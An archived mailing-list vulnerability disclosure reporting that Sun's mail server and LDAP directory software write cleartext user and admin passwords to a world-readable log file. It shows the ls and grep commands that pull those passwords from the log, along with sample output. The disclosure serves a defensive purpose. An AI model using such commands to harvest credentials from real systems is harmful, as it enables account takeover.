SIMS 3.x (Sun Internet Mail Server) and SDS 1.x & 3.1 (Sun LDAP Directory services) vulnerability. /var/opt/SUNWconn/ldap/log/slapd.log is used to log ldap connects/operations. I won't waste a lot of typing on detailing the problem, perhaps this simple example will suffice: % cd /var/opt/SUNWconn/ldap/log/ % ls -l slapd.log -rw-rw-rw- 1 root root 33519 Dec 16 16:00 slapd.log % grep password slapd.log Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=Joe T. User (joet),OU=People,O=email,C=US" scope=2 filter="(userpassword=bettysue)" % grep passwd | grep admin Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=admin (admin),OU=People,O=email,C=US" scope=2 filter="(userpassword=secret)" <sigh> yes folks, world readable (and writable for that matter) and clear text passwords and uids of all those folks logging into the IMAP server to check mail, etc. and on a machine that users can log into. Almost takes all the fun out of it. ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:26:20 PDT